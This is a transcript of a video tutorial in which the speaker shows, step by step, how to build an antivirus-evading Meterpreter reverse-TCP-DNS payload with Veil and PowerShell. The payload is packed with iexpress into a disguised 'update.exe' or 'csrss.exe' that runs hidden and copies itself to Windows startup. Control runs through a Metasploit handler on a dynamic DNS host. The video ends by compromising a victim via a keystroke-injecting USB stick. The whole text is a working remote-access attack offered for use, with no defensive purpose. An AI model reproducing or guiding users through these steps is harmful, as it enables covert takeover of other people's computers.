Hello boys and girls, this is Ainel. Today I'm gonna show you how to create a Meterpreter payload that works over the internet and you can control it even if your IP address changes with the aid of DNS. The nice thing about it is that it is fully undetectable due to the fact that it relies only on Microsoft tools which are automatically trusted by most antivirus. It works by combining PowerShell for creating the payload and iexpress for packing it into an unsuspicious executable file and optionally copying itself to the Windows startup. So let's start. First of all, you need to make sure that you have a dynamic DNS host setup. I'm using no IP, but you can use whatever you want. There are plenty of tutorials on YouTube to show you how to set up this thing. My host, as you can see, is blackcat.dns.net. We're gonna use this for DNS forwarding. Okay. Secondly, you need a working Kali Linux distribution and a copy of Veil, a nice program that creates undetectable payloads. First of all, type apt-get update After the update has finished, go ahead and type apt-get install Veil. It may take some time depending on the dependencies you have already installed. After the installation has finished, go ahead and type veil-evasion. This might take some time depending on your computer. When this window pops up, go ahead and click next, click override, yes, click finish, once again click next, finish, next, finish, here type A if this prompts you, uppercase A. After this painfully lengthy installation has finally finished, you will be presented with this menu. There are a lot of things that you can do over here, but we are gonna mainly focus on generating PowerShell payloads. Okay, let's start. First of all, type list, hit enter. As you can see, there are a lot of options, but we are gonna focus on this one, number 21, PowerShell Meterpreter, number 25, PowerShell shellcode inject virtual. So type use 25. Then type generate, type 1 for MSF Venom, and now it's the trick. Go ahead and type Windows Meterpreter reverse TCP DNS. Type it exactly like me, otherwise it won't work. Over here you wanna type your domain name without any HTTP or slashes. This is mine. blackcat.ddns.net. Don't put any www, otherwise it may not work. Over here you wanna type your preferred port. However, you have to make sure that this port is forwarded. If you don't know how to do this, there are once again a lot of tutorials on YouTube that explain it. However, if you want, you can ask me any question in the comments. I'm gonna use for now port 444. Type the same thing here. Type enter. Now over here type DNS and we are done. So Veil just compiled our payloads and they are in this location. Go ahead and browse in this location. And it is in source dns.bat. Here it is. Copy it to your Windows desktop. Create a new folder and call it my payload actually, and paste it in there. Now open another Explorer window and browse to see Windows syswow64. This is where the iExpress program is located. You wanna use the System32 version because for an unknown reason it doesn't work. Right click on the program and create a shortcut on the desktop. Now this is very important. You wanna run it as administrator, otherwise once again it won't work. Hit next, extract files and run installation command, type space and hit next, hit next, hit next, add, go to desktop, payload, click your payload, over here select dns.bat, and now this is another tricky part. You have to type cmd space /c space the name of your payload. Click hidden, hit next, next, hide file extracting progress animation from user. Now go to the folder where you copied the payload and type payload.exe. Now restart, hit next, don't save, hit next, next, finish. And it successfully created our payload. Next, I have copied some batch file instruction in the descriptions. You wanna create a batch file and paste them in here. Okay, name this bat file setup.bat and copy to the same folder that you have your payload. Then rename setup.bat, actually rename payload.exe to csrss.exe, and now we are done. Now go ahead and open once again iexpress.exe, run as administrator, do exactly the same things you did before, type space, but now you have to add both csrss.exe and setup.bat. Next, click the setup.bat and type cmd c setup.bat. click hidden, next, no message, hide file extracting progress animation from user. Next, click next, actually specify the file name, and we're gonna call it update.exe. No restart, don't save, and we are done. Now our payload is ready. When the user clicks it, not only does it send the stage error to our Meterpreter server, but also it copies itself to startup so that it is automatically activated each time the user powers on his computer. Now we have to create a handler so that we can listen to the payload. Type exit, clear, and open MSF console. Actually, go ahead and type nano DNS. Type use multi-handler set payload Windows /Meterpreter /reverse TCP _DNS set L port 444 set L host 0.0.0.0 and finally type exploit J. Type hit Ctrl and X and type Y, then type MSF console R DNS. Okay, so after Metasploit has launched, you're ready to attack any host. However, it has to be on a remote network. It has to use a public IP address than you. But now we wanna test the payload, and we can just configure it with some simple steps to work locally. First of all, you wanna set down your DNS update software. Secondly, open another terminal window, type ifconfig and note your local IP address. Mine is 192.168.1.12. Go ahead on your web page configuration for your DNS and change the public IP address that you used to have to 192.168.1.12 or yours, and hit update host. You're gonna have to wait approximately 1 minute, as you can see, and then you're ready to attack locally. As you can see, we already have a Meterpreter session. Type sessions I1 to control it. As you can see, my system has been bound. Now I can do everything. For example, we control the user and start. Okay guys, now it's time to illustrate how you can attack remotely. First of all, you wanna switch to the remote attack mode just by activating your IP update interface, your DNS update interface. Anyways, we have left a MSF console handler waiting for new connections, and we're also gonna have to wait again for our program to update the public IP. So after our DNS has been successfully updated, we can go ahead and check the IP address of the two systems. Okay, so this is the IP address of my attacking machine. As you can see, this is this one. And now let's go check the IP address of the victim machine. As you can see, the two IP addresses differ, so we are ready to attack. We can attack this machine with various methods, such as social engineering. However, I chose to attack it using the USB drive-by method, which is very interesting. I'm using a normal USB stick with a modified firmware so that when it is connected to the computer, it acts as a keyboard and types in very fast speed the payload. Let's check if it works and get back a session. Okay, it's ready. Let's see if we got any sessions back. As you can see, we just got a season, and the IP addresses differ, and we are connected over the internet. It's quite difficult to type with one hand. As you can see, the system is pawned, and then once again we can do everything we want. Let's open Nyan card. As you can see, it does work. So this is pretty much it, guys. Thank you for watching. I hope you liked my tutorial, and if you liked it, please like and subscribe. Thank you.